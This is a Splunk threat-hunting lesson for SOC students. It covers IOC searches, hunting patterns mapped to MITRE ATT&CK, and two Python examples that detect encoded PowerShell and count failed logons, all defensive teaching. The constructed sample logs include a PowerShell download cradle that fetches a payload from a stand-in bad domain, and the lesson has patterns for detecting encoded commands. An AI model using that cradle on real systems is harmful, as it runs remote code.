Day 10: Threat Hunting + IOC Search in Splunk
Today students learn how real SOC analysts hunt threats, not just wait for alerts.
Threat hunting = proactively searching for suspicious activity using IOCs (Indicators of Compromise) and known attacker behaviour patterns, instead of waiting for a detection rule to fire.
1. What Is Threat Hunting? (Easy Explanation)
Threat hunting is when SOC analysts:
- Look for unusual activity
- Search for attackers hiding in the network
- Find threats before alerts trigger
Example:
Attackers may bypass antivirus and leave no alerts.
Threat hunters find them using logs + patterns.
2. What Are IOCs (Indicators of Compromise)?
IOCs are observable signs that an attack has happened or is in progress:
- Bad IP
- Suspicious domain
- Malicious file hash
- Registry changes
- Crypto-mining processes
- Abnormal login patterns
Examples of IOCs
| Type | Example |
|---|---|
| Malicious IP | 185.234.219.203 |
| Bad Domain | updates-win-service.com |
| File Hash (MD5) | 44d88612fea8a8f36de82e1278abb02f (the MD5 of the EICAR test file, so it is safe to use in a lab) |
| Malware Process | powershell.exe -nop -enc … |
3. IOC Search in Splunk
These are keyword searches: Splunk matches whole terms, case-insensitively, so a bare IP or hash is found wherever it appears in the raw event. index=* scans every index and is slow on a real deployment; narrow the search to the right index or sourcetype as soon as you know where the data lives.
Search for malicious IP
index=* 185.234.219.203
Search for malicious domain
index=* "updates-win-service.com"
Search for file hash
index=* "44d88612fea8a8f36de82e1278abb02f"
Search for suspicious process
index=* powershell NOT Microsoft NOT VMtools
NOT Microsoft drops every event whose raw text contains that word, which includes many Windows events whose log name or description mentions Microsoft, so treat this as a rough first cut rather than a complete picture.
Search for encoded PowerShell
index=* powershell
| regex _raw="(?i)\s[-/]e(c|n(c(odedcommand)?)?)?\s+[A-Za-z0-9+/=]{16,}"
powershell.exe accepts -ec and any leading fragment of -EncodedCommand (-e, -en, -enc, ...), so a search for the literal word "EncodedCommand" misses most real encoded commands. The regex catches the common short forms followed by a base64 blob; decode a hit (base64, then UTF-16LE) to see the actual command.
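The matching behind the searches above, done offline in Python so students can see what the keyword searches look for and where they fall short. This is an added example, not part of the original lesson and not Splunk code; the log lines are constructed, and the IOC values are the ones from the table in section 2. It goes a step beyond the searches: powershell.exe accepts -ec and any abbreviation of -EncodedCommand, so the matcher covers those forms, decodes the base64/UTF-16LE payload, and re-checks the decoded command against the IOC list, because an IOC that only appears inside the encoded blob is invisible to a plain keyword search.

```python
"""Offline IOC hunt over constructed log lines. Added example for the lesson's
IOC searches; the events are made up, the IOC values come from the table in section 2."""
import base64
import binascii
import re

# IOC -> type. The hash is the MD5 of the EICAR test file, so it is safe to use in a lab.
IOCS = {
    "185.234.219.203": "malicious_ip",
    "updates-win-service.com": "bad_domain",
    "44d88612fea8a8f36de82e1278abb02f": "file_hash",
}

# powershell.exe accepts -ec and any leading fragment of -EncodedCommand (-e, -en, -enc, ...),
# with either - or / as the switch character. A search for the literal word "EncodedCommand"
# therefore misses nearly every real encoded command.
_ENC_FLAGS = sorted(["ec"] + ["encodedcommand"[:i] for i in range(1, 15)], key=len, reverse=True)
ENCODED_RE = re.compile(
    r"(?<![\w-])[-/](?:" + "|".join(_ENC_FLAGS) + r")\s+([A-Za-z0-9+/=]{8,})", re.IGNORECASE)


def encode_powershell(command):
    """Produce the blob -EncodedCommand expects: UTF-16LE text, base64 encoded."""
    return base64.b64encode(command.encode("utf-16-le")).decode("ascii")


def decode_encoded_command(blob):
    """Reverse of encode_powershell; None if the blob is not valid base64/UTF-16LE."""
    try:
        return base64.b64decode(blob, validate=True).decode("utf-16-le")
    except (binascii.Error, UnicodeDecodeError, ValueError):
        return None


def hunt(lines, iocs=IOCS):
    """One finding per IOC hit or encoded-PowerShell hit, in line order.
    Decoded commands are re-checked against the IOC list, because an IOC that only
    appears inside the base64 blob never matches a keyword search on the raw event."""
    findings = []
    for n, line in enumerate(lines, start=1):
        low = line.lower()
        for value, kind in iocs.items():
            if value.lower() in low:
                findings.append({"line": n, "type": kind, "value": value})
        m = ENCODED_RE.search(line)
        if m and "powershell" in low:
            decoded = decode_encoded_command(m.group(1))
            findings.append({"line": n, "type": "encoded_powershell", "value": decoded})
            for value, kind in iocs.items():
                if decoded and value.lower() in decoded.lower():
                    findings.append({"line": n, "type": kind + "_in_encoded_command", "value": value})
    return findings


# Constructed sample events (not real telemetry). Line 4 carries a download cradle that
# references the bad domain only inside its encoded payload.
STAGER = "IEX (New-Object Net.WebClient).DownloadString('http://updates-win-service.com/a')"
SAMPLE_LOGS = [
    "2024-05-01T10:00:01 fw action=allowed src=10.0.0.5 dst=185.234.219.203 dport=443",
    "2024-05-01T10:00:02 dns client=10.0.0.5 query=updates-win-service.com rcode=NOERROR",
    "2024-05-01T10:00:03 av file=C:\\Temp\\x.exe md5=44D88612FEA8A8F36DE82E1278ABB02F verdict=clean",
    "2024-05-01T10:00:04 sysmon EventCode=1 CommandLine=powershell.exe -nop -w hidden -e "
    + encode_powershell(STAGER),
    "2024-05-01T10:00:05 sysmon EventCode=1 CommandLine=powershell.exe -File C:\\scripts\\backup.ps1",
    "2024-05-01T10:00:06 fw action=allowed src=10.0.0.6 dst=8.8.8.8 dport=53",
]

if __name__ == "__main__":
    for finding in hunt(SAMPLE_LOGS):
        print(finding)
```

Run it and compare with the Splunk searches: the IP, domain and hash hits are what index=* <ioc> returns (note the hash matches even though the log wrote it in upper case), the encoded line is what the literal "EncodedCommand" search would have missed, and the final finding is the domain IOC surfacing only after decoding.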
4. Threat Hunting Patterns (MITRE ATT&CK based)
Pattern 1 - Credential Access (T1110 Brute Force)
Check failed login spikes. Splunk matches whole terms, so the keyword fail would not match "Failed" or "failure"; search the actual failure events instead:
index=* (EventCode=4625 OR "Failed password")
| timechart count span=1m
Pattern 2 - Lateral Movement (T1021.001 Remote Desktop Protocol)
Hunt for RDP logins. Logon_Type=10 is RemoteInteractive, and the 4624 event is written on the host that was logged into, so the source address in the event tells you where the session came from:
index=* EventCode=4624 Logon_Type=10
Pattern 3 - Persistence (T1136 Create Account)
Hunt for new account creation (4720 = "A user account was created"):
index=* EventCode=4720
Pattern 4 - Execution (T1059.001 PowerShell)
Hunt for suspicious PowerShell, including the abbreviated -e / -ec / -enc forms of -EncodedCommand that a search for the literal word misses:
index=* powershell
| regex _raw="(?i)\s[-/]e(c|n(c(odedcommand)?)?)?\s+[A-Za-z0-9+/=]{16,}"
Pattern 5 - Discovery (T1087 Account Discovery; whoami is T1033 System Owner/User Discovery)
Hunt for enumeration commands. Multi-word commands must be quoted, otherwise net user is read as two separate terms that can match unrelated events:
index=* ("net user" OR "net group" OR whoami)
5. Hands-On Threat Hunt (Students Will Perform)
Task 1 - Find RDP activity in last 24 hours
index=* EventCode=4624 Logon_Type=10 earliest=-24h
Task 2 - Find failed logins from same IP
index=* EventCode=4625
| stats count by IpAddress
| where count > 5
Use EventCode=4625 rather than the bare number, which also matches 4625 appearing as a port or process ID. IpAddress is the field name when the Windows add-on ingests XML-rendered events; with classic event text the same value is extracted as Source_Network_Address. Check which one your events carry before trusting an empty result.
Task 3 - Search for encoded PowerShell
index=* powershell
| regex _raw="(?i)\s[-/]e(c|n(c(odedcommand)?)?)?\s+[A-Za-z0-9+/=]{16,}"
Task 4 - Search for suspicious domains
index=* (".xyz" OR ".top" OR "download")
This is a coarse keyword hunt and "download" will hit plenty of benign traffic; use it to locate the DNS or proxy events, then pivot to the domain field and look at the rare values.
Task 5 - Hunt for Linux brute-force
index=* "Failed password"
| stats count by src_ip
src_ip must already be extracted as a field from the sshd message; if it is not, stats has nothing to group by, so add the field extraction first.
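The counting behind Pattern 1 (timechart count span=1m) and Tasks 2 and 5 (stats count by IP, where count > 5), run in Python over constructed Windows 4625 and Linux sshd lines. This is an added example, not code from the lesson; the log lines are made up, the year 2024 is assumed for the syslog timestamps, and Source_Network_Address / IpAddress are the two field names the text discusses. It shows the difference between the two thresholds: the all-time count in Task 2 catches a low-and-slow source that spreads one failure per minute, while a per-minute bucket catches bursts but lets that same source through.

```python
"""Failed-logon aggregation over constructed Windows 4625 and Linux sshd lines.
Added example for the lesson's brute-force searches; the log lines are made up."""
from collections import Counter
from datetime import datetime
import re

# Windows 4625 in key=value form. The source address is Source_Network_Address when the
# Splunk Windows add-on ingests classic event text and IpAddress when it ingests XML events.
WIN_FAIL_RE = re.compile(
    r"^(?P<ts>\d{4}-\d\d-\d\dT\d\d:\d\d:\d\d)\b.*\bEventCode=4625\b.*"
    r"\b(?:Source_Network_Address|IpAddress)=(?P<ip>\d{1,3}(?:\.\d{1,3}){3})")
# Linux sshd failures as syslog writes them: no year in the timestamp, day padded with a space.
LINUX_FAIL_RE = re.compile(
    r"^(?P<ts>[A-Z][a-z]{2}\s+\d{1,2} \d\d:\d\d:\d\d) \S+ sshd\[\d+\]: "
    r"Failed password for (?:invalid user )?(?P<user>\S+) from (?P<ip>\d{1,3}(?:\.\d{1,3}){3})")


def parse_failed_logon(line, year=2024):
    """Return {'ts', 'ip', 'src'} for a failed-logon line, None for anything else.
    Successful logons (4624, 'Accepted password') are deliberately not parsed."""
    m = WIN_FAIL_RE.search(line)
    if m:
        return {"ts": datetime.fromisoformat(m["ts"]), "ip": m["ip"], "src": "windows"}
    m = LINUX_FAIL_RE.search(line)
    if m:
        # syslog omits the year; assume one (the constructed data is all from 2024)
        ts = datetime.strptime(f"{year} {m['ts']}", "%Y %b %d %H:%M:%S")
        return {"ts": ts, "ip": m["ip"], "src": "linux"}
    return None


def _minute(ts):
    """Bucket a timestamp the way timechart span=1m does."""
    return ts.replace(second=0, microsecond=0).isoformat()


def count_by_ip(lines):
    """stats count by src_ip: total failed logons per source, all time."""
    return dict(Counter(ev["ip"] for ev in map(parse_failed_logon, lines) if ev))


def timechart_failures(lines):
    """timechart count span=1m: failed logons per one-minute bucket, oldest first."""
    c = Counter(_minute(ev["ts"]) for ev in map(parse_failed_logon, lines) if ev)
    return dict(sorted(c.items()))


def over_threshold_total(lines, threshold=5):
    """Task 2 as written: sources whose all-time failure count exceeds the threshold."""
    return sorted(ip for ip, n in count_by_ip(lines).items() if n > threshold)


def burst_sources(lines, threshold=5):
    """Sources that exceed the threshold inside a single minute. Catches a password-guessing
    burst, but a low-and-slow source (one failure per minute) never trips it."""
    per_ip_minute = Counter()
    for ev in map(parse_failed_logon, lines):
        if ev:
            per_ip_minute[(_minute(ev["ts"]), ev["ip"])] += 1
    return [{"ip": ip, "minute": minute, "count": n}
            for (minute, ip), n in sorted(per_ip_minute.items()) if n > threshold]


# Constructed sample data (not real telemetry):
#  - 203.0.113.7:  8 Windows failures inside one minute (7 classic-format, 1 XML-format)
#  - 192.0.2.50:   6 Windows failures, one per minute (low and slow)
#  - 10.0.0.8:     2 failures, a user mistyping a password, then a successful RDP logon
#  - 198.51.100.9: 6 sshd failures in one minute, then 1 more a minute later
SAMPLE_LOGS = (
    [f"2024-05-01T10:00:{s:02d} EventCode=4625 Account_Name=administrator "
     f"Source_Network_Address=203.0.113.7" for s in range(1, 8)]
    + ["2024-05-01T10:00:08 EventCode=4625 Account_Name=administrator IpAddress=203.0.113.7"]
    + [f"2024-05-01T10:0{m}:30 EventCode=4625 Account_Name=svc_backup "
       f"Source_Network_Address=192.0.2.50" for m in range(6)]
    + ["2024-05-01T10:01:10 EventCode=4625 Account_Name=jsmith Source_Network_Address=10.0.0.8",
       "2024-05-01T10:01:40 EventCode=4625 Account_Name=jsmith Source_Network_Address=10.0.0.8",
       "2024-05-01T10:01:50 EventCode=4624 Logon_Type=10 Account_Name=jsmith IpAddress=10.0.0.8"]
    + [f"May  1 10:02:{s:02d} web01 sshd[2201]: Failed password for {u} from 198.51.100.9 "
       f"port {40112 + s} ssh2"
       for s, u in enumerate(["root", "admin", "invalid user test", "root", "oracle",
                              "invalid user guest"])]
    + ["May  1 10:03:30 web01 sshd[2201]: Failed password for root from 198.51.100.9 port 40120 ssh2",
       "May  1 10:03:31 web01 sshd[2202]: Accepted password for deploy from 10.0.0.20 port 50000 ssh2"]
)

if __name__ == "__main__":
    print("per minute:", timechart_failures(SAMPLE_LOGS))
    print("total > 5: ", over_threshold_total(SAMPLE_LOGS))
    print("burst > 5: ", burst_sources(SAMPLE_LOGS))
```

Running it lists 192.0.2.50 under the all-time threshold but not under the per-minute one, and 203.0.113.7 and 198.51.100.9 under both; when you run Task 2 in Splunk, try adding a span to the stats (or switching to timechart) and watch which sources appear and disappear.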
6. Threat Hunting Workflow (Teach Students This)
Simple 5-step method for beginners:
1. Start with a question
"Is someone trying to brute force my system?"
2. Collect relevant logs
Windows + Linux + Network
3. Run focused Splunk queries
Use IOCs, patterns, keywords
4. Investigate suspicious events
Identify IPs, users, timestamps
5. Conclude
Threat or no threat?
Trainer Script
"Threat hunting is proactive.
You don't wait for alerts; you go find the attacker.
Using IOCs and Splunk queries, you can uncover hidden attacks."
Homework (Day 10)
Students submit:
- One IOC (IP/domain/hash)
- A Splunk search using that IOC
- MITRE tactic mapping
- One screenshot of search results